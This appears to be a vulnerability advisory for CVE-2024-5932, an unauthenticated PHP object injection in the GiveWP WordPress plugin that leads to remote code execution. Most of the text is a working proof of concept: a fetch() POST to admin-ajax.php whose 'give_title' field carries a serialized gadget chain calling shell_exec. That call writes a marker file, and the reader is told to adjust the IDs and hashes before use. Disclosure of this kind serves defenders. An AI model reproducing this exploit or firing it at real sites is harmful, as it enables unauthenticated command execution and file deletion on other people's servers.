GiveWP < 3.14.2 – Unauthenticated PHP Object Injection to RCE | CVE 2024-5932

Description

The plugin is vulnerable to PHP Object Injection via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.

Proof of Concept

Replace IDs and hashes where applicable:

await fetch("/wp-admin/admin-ajax.php", {
    "credentials": "omit",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0",
        "Accept": "*/*",
        "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Sec-GPC": "1",
        "Priority": "u=0"
    },
    "referrer": "/give/211?giveDonationFormInIframe=1",
    "body": "give-honeypot=&give-form-id-prefix=211-1&give-form-id=211&give-form-title=&give-current-url=http%3A%2F%2Fwpscan-vulnerability-test-bench.ddev.site%2Fdonations%2F211%2F&give-form-url=http%3A%2F%2Fwpscan-vulnerability-test-bench.ddev.site%2F&give-form-minimum=5.00&give-form-maximum=999999.99&give-form-hash=99ca07aef1&give-price-id=1&give-amount=25.00&give_title=O%3A19%3A%5C%5C%5C%22Stripe%5C%5C%5C%5CStripeObject%5C%5C%5C%22%3A1%3A%7Bs%3A10%3A%5C%5C%5C%22%5C%5C0%2A%5C%5C0_values%5C%5C%5C%22%3Ba%3A1%3A%7Bs%3A3%3A%5C%5C%5C%22foo%5C%5C%5C%22%3BO%3A62%3A%5C%5C%5C%22Give%5C%5C%5C%5CPaymentGateways%5C%5C%5C%5CDataTransferObjects%5C%5C%5C%5CGiveInsertPaymentData%5C%5C%5C%22%3A11%3A%7Bs%3A5%3A%5C%5C%5C%22price%5C%5C%5C%22%3BN%3Bs%3A7%3A%5C%5C%5C%22priceId%5C%5C%5C%22%3BN%3Bs%3A4%3A%5C%5C%5C%22date%5C%5C%5C%22%3BN%3Bs%3A11%3A%5C%5C%5C%22purchaseKey%5C%5C%5C%22%3BN%3Bs%3A8%3A%5C%5C%5C%22currency%5C%5C%5C%22%3BN%3Bs%3A9%3A%5C%5C%5C%22formTitle%5C%5C%5C%22%3BN%3Bs%3A6%3A%5C%5C%5C%22formId%5C%5C%5C%22%3BN%3Bs%3A8%3A%5C%5C%5C%22userInfo%5C%5C%5C%22%3Ba%3A1%3A%7Bs%3A7%3A%5C%5C%5C%22address%5C%5C%5C%22%3BO%3A4%3A%5C%5C%5C%22Give%5C%5C%5C%22%3A1%3A%7Bs%3A15%3A%5C%5C%5C%22%5C%5C0Give%5C%5C0container%5C%5C%5C%22%3BO%3A33%3A%5C%5C%5C%22Give%5C%5C%5C%5CVendors%5C%5C%5C%5CFaker%5C%5C%5C%5CValidGenerator%5C%5C%5C%22%3A3%3A%7Bs%3A12%3A%5C%5C%5C%22%5C%5C0%2A%5C%5C0validator%5C%5C%5C%22%3Bs%3A10%3A%5C%5C%5C%22shell_exec%5C%5C%5C%22%3Bs%3A13%3A%5C%5C%5C%22%5C%5C0%2A%5C%5C0maxRetries%5C%5C%5C%22%3Bi%3A1%3Bs%3A12%3A%5C%5C%5C%22%5C%5C0%2A%5C%5C0generator%5C%5C%5C%22%3BO%3A45%3A%5C%5C%5C%22Give%5C%5C%5C%5CSession%5C%5C%5C%5CSessionDonation%5C%5C%5C%5CDonationAccessor%5C%5C%5C%22%3A1%3A%7Bs%3A10%3A%5C%5C%5C%22%5C%5C0%2A%5C%5C0dataObj%5C%5C%5C%22%3Bs%3A27%3A%5C%5C%5C%22echo+%5C%5C%5C%22Hacked%21%5C%5C%5C%22+%3E+hacked.txt%5C%5C%5C%22%3B%7D%7D%7D%7Ds%3A10%3A%5C%5C%5C%22donorEmail%5C%5C%5C%22%3BN%3Bs%3A14%3A%5C%5C%5C%22paymentGateway%5C%5C%5C%22%3BN%3Bs%3A7%3A%5C%5C%5C%22donorId%5C%5C%5C%22%3BN%3B%7D%7D%7D&give_first=Hacker&give_last=Hacksstufff&give_email=email@domain.tld&payment-mode=offline&give_action=purchase&give-gateway=offline&give_embed_form=1&action=give_process_donation",
    "method": "POST",
    "mode": "cors"
});